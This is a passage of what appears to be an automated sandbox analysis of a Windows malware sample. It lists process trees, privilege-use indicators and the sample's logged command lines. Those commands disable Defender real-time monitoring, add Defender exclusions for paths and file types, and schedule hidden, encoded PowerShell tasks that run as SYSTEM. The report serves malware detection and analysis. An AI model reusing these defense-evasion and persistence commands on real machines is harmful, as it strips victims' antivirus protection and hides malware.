400	schtasks.exe
2356	schtasks.exe
2808	schtasks.exe
2916	schtasks.exe
500	schtasks.exe

Suspicious behavior: EnumeratesProcesses 30 IoCs

Processes:

powershell.exepowershell.EXEpowershell.EXEpowershell.exepowershell.EXEaqigWbl.exepowershell.exepowershell.exe

pid	process
2612	powershell.exe
2320	powershell.EXE
2320	powershell.EXE
2320	powershell.EXE
848	powershell.EXE
848	powershell.EXE
848	powershell.EXE
888	powershell.exe
1580	powershell.EXE
1580	powershell.EXE
1580	powershell.EXE
2288	aqigWbl.exe
2288	aqigWbl.exe
2288	aqigWbl.exe
2288	aqigWbl.exe
2288	aqigWbl.exe
2288	aqigWbl.exe
2288	aqigWbl.exe
2288	aqigWbl.exe
1280	powershell.exe
1428	powershell.exe
2288	aqigWbl.exe
2288	aqigWbl.exe
2288	aqigWbl.exe
2288	aqigWbl.exe
2288	aqigWbl.exe
2288	aqigWbl.exe
2288	aqigWbl.exe
2288	aqigWbl.exe
2288	aqigWbl.exe

Suspicious use of AdjustPrivilegeToken 63 IoCs

Processes:

powershell.exeWMIC.exepowershell.EXEpowershell.EXEpowershell.exeWMIC.exepowershell.EXEpowershell.exeWMIC.exepowershell.exeWMIC.exe

description	pid	process
Token: SeDebugPrivilege	2612	powershell.exe
Token: SeIncreaseQuotaPrivilege	2452	WMIC.exe
Token: SeSecurityPrivilege	2452	WMIC.exe
Token: SeTakeOwnershipPrivilege	2452	WMIC.exe
Token: SeLoadDriverPrivilege	2452	WMIC.exe
Token: SeSystemProfilePrivilege	2452	WMIC.exe
Token: SeSystemtimePrivilege	2452	WMIC.exe
Token: SeProfSingleProcessPrivilege	2452	WMIC.exe
Token: SeIncBasePriorityPrivilege	2452	WMIC.exe
Token: SeCreatePagefilePrivilege	2452	WMIC.exe
Token: SeBackupPrivilege	2452	WMIC.exe
Token: SeRestorePrivilege	2452	WMIC.exe
Token: SeShutdownPrivilege	2452	WMIC.exe
Token: SeDebugPrivilege	2452	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2452	WMIC.exe
Token: SeRemoteShutdownPrivilege	2452	WMIC.exe
Token: SeUndockPrivilege	2452	WMIC.exe
Token: SeManageVolumePrivilege	2452	WMIC.exe
Token: 33	2452	WMIC.exe
Token: 34	2452	WMIC.exe
Token: 35	2452	WMIC.exe
Token: SeDebugPrivilege	2320	powershell.EXE
Token: SeDebugPrivilege	848	powershell.EXE
Token: SeDebugPrivilege	888	powershell.exe
Token: SeAssignPrimaryTokenPrivilege	2188	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2188	WMIC.exe
Token: SeSecurityPrivilege	2188	WMIC.exe
Token: SeTakeOwnershipPrivilege	2188	WMIC.exe
Token: SeLoadDriverPrivilege	2188	WMIC.exe
Token: SeSystemtimePrivilege	2188	WMIC.exe
Token: SeBackupPrivilege	2188	WMIC.exe
Token: SeRestorePrivilege	2188	WMIC.exe
Token: SeShutdownPrivilege	2188	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2188	WMIC.exe
Token: SeUndockPrivilege	2188	WMIC.exe
Token: SeManageVolumePrivilege	2188	WMIC.exe
Token: SeDebugPrivilege	1580	powershell.EXE
Token: SeDebugPrivilege	1280	powershell.exe
Token: SeAssignPrimaryTokenPrivilege	2852	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2852	WMIC.exe
Token: SeSecurityPrivilege	2852	WMIC.exe
Token: SeTakeOwnershipPrivilege	2852	WMIC.exe
Token: SeLoadDriverPrivilege	2852	WMIC.exe
Token: SeSystemtimePrivilege	2852	WMIC.exe
Token: SeBackupPrivilege	2852	WMIC.exe
Token: SeRestorePrivilege	2852	WMIC.exe
Token: SeShutdownPrivilege	2852	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2852	WMIC.exe
Token: SeUndockPrivilege	2852	WMIC.exe
Token: SeManageVolumePrivilege	2852	WMIC.exe
Token: SeDebugPrivilege	1428	powershell.exe
Token: SeAssignPrimaryTokenPrivilege	996	WMIC.exe
Token: SeIncreaseQuotaPrivilege	996	WMIC.exe
Token: SeSecurityPrivilege	996	WMIC.exe
Token: SeTakeOwnershipPrivilege	996	WMIC.exe
Token: SeLoadDriverPrivilege	996	WMIC.exe
Token: SeSystemtimePrivilege	996	WMIC.exe
Token: SeBackupPrivilege	996	WMIC.exe
Token: SeRestorePrivilege	996	WMIC.exe
Token: SeShutdownPrivilege	996	WMIC.exe
Token: SeSystemEnvironmentPrivilege	996	WMIC.exe
Token: SeUndockPrivilege	996	WMIC.exe
Token: SeManageVolumePrivilege	996	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

dea7ce83cf17b409453bc273ee0368909d3b1f1199fe288e70e1eb389654da7b.exeInstall.exeInstall.exeforfiles.execmd.exepowershell.exetaskeng.exePuqtIqm.exetaskeng.exe

description	pid	process	target process
PID 2060 wrote to memory of 2104	2060	dea7ce83cf17b409453bc273ee0368909d3b1f1199fe288e70e1eb389654da7b.exe	Install.exe
PID 2060 wrote to memory of 2104	2060	dea7ce83cf17b409453bc273ee0368909d3b1f1199fe288e70e1eb389654da7b.exe	Install.exe
PID 2060 wrote to memory of 2104	2060	dea7ce83cf17b409453bc273ee0368909d3b1f1199fe288e70e1eb389654da7b.exe	Install.exe
PID 2060 wrote to memory of 2104	2060	dea7ce83cf17b409453bc273ee0368909d3b1f1199fe288e70e1eb389654da7b.exe	Install.exe
PID 2060 wrote to memory of 2104	2060	dea7ce83cf17b409453bc273ee0368909d3b1f1199fe288e70e1eb389654da7b.exe	Install.exe
PID 2060 wrote to memory of 2104	2060	dea7ce83cf17b409453bc273ee0368909d3b1f1199fe288e70e1eb389654da7b.exe	Install.exe
PID 2060 wrote to memory of 2104	2060	dea7ce83cf17b409453bc273ee0368909d3b1f1199fe288e70e1eb389654da7b.exe	Install.exe
PID 2104 wrote to memory of 2620	2104	Install.exe	Install.exe
PID 2104 wrote to memory of 2620	2104	Install.exe	Install.exe
PID 2104 wrote to memory of 2620	2104	Install.exe	Install.exe
PID 2104 wrote to memory of 2620	2104	Install.exe	Install.exe
PID 2104 wrote to memory of 2620	2104	Install.exe	Install.exe
PID 2104 wrote to memory of 2620	2104	Install.exe	Install.exe
PID 2104 wrote to memory of 2620	2104	Install.exe	Install.exe
PID 2620 wrote to memory of 2996	2620	Install.exe	forfiles.exe
PID 2620 wrote to memory of 2996	2620	Install.exe	forfiles.exe
PID 2620 wrote to memory of 2996	2620	Install.exe	forfiles.exe
PID 2620 wrote to memory of 2996	2620	Install.exe	forfiles.exe
PID 2620 wrote to memory of 2996	2620	Install.exe	forfiles.exe
PID 2620 wrote to memory of 2996	2620	Install.exe	forfiles.exe
PID 2620 wrote to memory of 2996	2620	Install.exe	forfiles.exe
PID 2996 wrote to memory of 2308	2996	forfiles.exe	cmd.exe
PID 2996 wrote to memory of 2308	2996	forfiles.exe	cmd.exe
PID 2996 wrote to memory of 2308	2996	forfiles.exe	cmd.exe
PID 2996 wrote to memory of 2308	2996	forfiles.exe	cmd.exe
PID 2996 wrote to memory of 2308	2996	forfiles.exe	cmd.exe
PID 2996 wrote to memory of 2308	2996	forfiles.exe	cmd.exe
PID 2996 wrote to memory of 2308	2996	forfiles.exe	cmd.exe
PID 2308 wrote to memory of 2612	2308	cmd.exe	powershell.exe
PID 2308 wrote to memory of 2612	2308	cmd.exe	powershell.exe
PID 2308 wrote to memory of 2612	2308	cmd.exe	powershell.exe
PID 2308 wrote to memory of 2612	2308	cmd.exe	powershell.exe
PID 2308 wrote to memory of 2612	2308	cmd.exe	powershell.exe
PID 2308 wrote to memory of 2612	2308	cmd.exe	powershell.exe
PID 2308 wrote to memory of 2612	2308	cmd.exe	powershell.exe
PID 2612 wrote to memory of 2452	2612	powershell.exe	WMIC.exe
PID 2612 wrote to memory of 2452	2612	powershell.exe	WMIC.exe
PID 2612 wrote to memory of 2452	2612	powershell.exe	WMIC.exe
PID 2612 wrote to memory of 2452	2612	powershell.exe	WMIC.exe
PID 2612 wrote to memory of 2452	2612	powershell.exe	WMIC.exe
PID 2612 wrote to memory of 2452	2612	powershell.exe	WMIC.exe
PID 2612 wrote to memory of 2452	2612	powershell.exe	WMIC.exe
PID 2620 wrote to memory of 2744	2620	Install.exe	schtasks.exe
PID 2620 wrote to memory of 2744	2620	Install.exe	schtasks.exe
PID 2620 wrote to memory of 2744	2620	Install.exe	schtasks.exe
PID 2620 wrote to memory of 2744	2620	Install.exe	schtasks.exe
PID 2620 wrote to memory of 2744	2620	Install.exe	schtasks.exe
PID 2620 wrote to memory of 2744	2620	Install.exe	schtasks.exe
PID 2620 wrote to memory of 2744	2620	Install.exe	schtasks.exe
PID 2696 wrote to memory of 1968	2696	taskeng.exe	PuqtIqm.exe
PID 2696 wrote to memory of 1968	2696	taskeng.exe	PuqtIqm.exe
PID 2696 wrote to memory of 1968	2696	taskeng.exe	PuqtIqm.exe
PID 2696 wrote to memory of 1968	2696	taskeng.exe	PuqtIqm.exe
PID 1968 wrote to memory of 1976	1968	PuqtIqm.exe	schtasks.exe
PID 1968 wrote to memory of 1976	1968	PuqtIqm.exe	schtasks.exe
PID 1968 wrote to memory of 1976	1968	PuqtIqm.exe	schtasks.exe
PID 1968 wrote to memory of 1976	1968	PuqtIqm.exe	schtasks.exe
PID 1968 wrote to memory of 348	1968	PuqtIqm.exe	schtasks.exe
PID 1968 wrote to memory of 348	1968	PuqtIqm.exe	schtasks.exe
PID 1968 wrote to memory of 348	1968	PuqtIqm.exe	schtasks.exe
PID 1968 wrote to memory of 348	1968	PuqtIqm.exe	schtasks.exe
PID 308 wrote to memory of 2320	308	taskeng.exe	powershell.EXE
PID 308 wrote to memory of 2320	308	taskeng.exe	powershell.EXE
PID 308 wrote to memory of 2320	308	taskeng.exe	powershell.EXE

C:\Users\Admin\AppData\Local\Temp\dea7ce83cf17b409453bc273ee0368909d3b1f1199fe288e70e1eb389654da7b.exe
"C:\Users\Admin\AppData\Local\Temp\dea7ce83cf17b409453bc273ee0368909d3b1f1199fe288e70e1eb389654da7b.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2060

C:\Users\Admin\AppData\Local\Temp\7zS257B.tmp\Install.exe
.\Install.exe
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2104

C:\Users\Admin\AppData\Local\Temp\7zS2D67.tmp\Install.exe
.\Install.exe /enOdidSjff "525403" /S
3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:2620

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m help.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
4⤵
- Suspicious use of WriteProcessMemory
PID:2996

C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
5⤵
- Suspicious use of WriteProcessMemory
PID:2308

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2612

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2452

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bmQWCxleEgxbTUrSZz" /SC once /ST 05:10:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\zaBVKDgOQJLqBjiNo\lWMApHnNtvIHqRb\PuqtIqm.exe\" xv /zFpdidl 525403 /S" /V1 /F
4⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:2744

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2620 -s 484
4⤵
- Loads dropped DLL
- Program crash
PID:2472

C:\Windows\system32\taskeng.exe
taskeng.exe {0D4D7791-2A20-470B-8522-E2409427019A} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
- Suspicious use of WriteProcessMemory
PID:2696

C:\Users\Admin\AppData\Local\Temp\zaBVKDgOQJLqBjiNo\lWMApHnNtvIHqRb\PuqtIqm.exe
C:\Users\Admin\AppData\Local\Temp\zaBVKDgOQJLqBjiNo\lWMApHnNtvIHqRb\PuqtIqm.exe xv /zFpdidl 525403 /S
2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:1968

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gcLXKmkvA" /SC once /ST 01:03:00 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
3⤵
- Scheduled Task/Job: Scheduled Task
PID:1976

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gcLXKmkvA"
3⤵
PID:348

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gcLXKmkvA"
3⤵
PID:2804

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
3⤵
PID:576

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:1520

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
3⤵
PID:1144

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:1612

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gEkWVaXEm" /SC once /ST 03:40:46 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
3⤵
- Scheduled Task/Job: Scheduled Task
PID:400

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gEkWVaXEm"
3⤵
PID:2132

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gEkWVaXEm"
3⤵
PID:2100

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"
3⤵
PID:2232

C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
4⤵
PID:2036

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:888

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:2188

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ruCXiJvmKkuTmmIt" /t REG_DWORD /d 0 /reg:32
3⤵
PID:2760

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ruCXiJvmKkuTmmIt" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:1068

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ruCXiJvmKkuTmmIt" /t REG_DWORD /d 0 /reg:64
3⤵
PID:2756

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ruCXiJvmKkuTmmIt" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:2368

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ruCXiJvmKkuTmmIt" /t REG_DWORD /d 0 /reg:32
3⤵
PID:2992

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ruCXiJvmKkuTmmIt" /t REG_DWORD /d 0 /reg:32
4⤵
PID:3048

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ruCXiJvmKkuTmmIt" /t REG_DWORD /d 0 /reg:64
3⤵
PID:2536

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ruCXiJvmKkuTmmIt" /t REG_DWORD /d 0 /reg:64
4⤵
PID:620

C:\Windows\SysWOW64\cmd.exe
cmd /C copy nul "C:\Windows\Temp\ruCXiJvmKkuTmmIt\ZkbXpEgH\psBAZOHlkJGKQgnE.wsf"
3⤵
PID:2988

C:\Windows\SysWOW64\wscript.exe
wscript "C:\Windows\Temp\ruCXiJvmKkuTmmIt\ZkbXpEgH\psBAZOHlkJGKQgnE.wsf"
3⤵
- Modifies data under HKEY_USERS
PID:1656

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ATiuMetuMWHU2" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:2568

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ATiuMetuMWHU2" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:2484

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DcwzooFfPwZYrvRkwnR" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:2520

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DcwzooFfPwZYrvRkwnR" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:2612

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IchmcMfQaXUn" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:2628

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IchmcMfQaXUn" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:2148

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UyPATDbiwjgOC" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:500

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UyPATDbiwjgOC" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:2948

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VcCVDDBRU" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:2616

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VcCVDDBRU" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:2784

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\NonltQQlyMoZtVVB" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:1596

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\NonltQQlyMoZtVVB" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:1996

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:1808

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:2884

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\zaBVKDgOQJLqBjiNo" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:2216

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\zaBVKDgOQJLqBjiNo" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:1836

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ruCXiJvmKkuTmmIt" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:1576

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ruCXiJvmKkuTmmIt" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:2528

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ATiuMetuMWHU2" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1568

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ATiuMetuMWHU2" /t REG_DWORD /d 0 /reg:64
4⤵
PID:2860

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DcwzooFfPwZYrvRkwnR" /t REG_DWORD /d 0 /reg:32
4⤵
PID:2900

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DcwzooFfPwZYrvRkwnR" /t REG_DWORD /d 0 /reg:64
4⤵
PID:2260

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IchmcMfQaXUn" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1104

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IchmcMfQaXUn" /t REG_DWORD /d 0 /reg:64
4⤵
PID:588

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UyPATDbiwjgOC" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1916

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UyPATDbiwjgOC" /t REG_DWORD /d 0 /reg:64
4⤵
PID:2388

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VcCVDDBRU" /t REG_DWORD /d 0 /reg:32
4⤵
PID:2152

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VcCVDDBRU" /t REG_DWORD /d 0 /reg:64
4⤵
PID:3056

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\NonltQQlyMoZtVVB" /t REG_DWORD /d 0 /reg:32
4⤵
PID:2264

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\NonltQQlyMoZtVVB" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1640

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1536

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
4⤵
PID:956

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\zaBVKDgOQJLqBjiNo" /t REG_DWORD /d 0 /reg:32
4⤵
PID:912

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\zaBVKDgOQJLqBjiNo" /t REG_DWORD /d 0 /reg:64
4⤵
PID:2012

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ruCXiJvmKkuTmmIt" /t REG_DWORD /d 0 /reg:32
4⤵
PID:2896

C:\Windows\SysWOW64\reg.exe
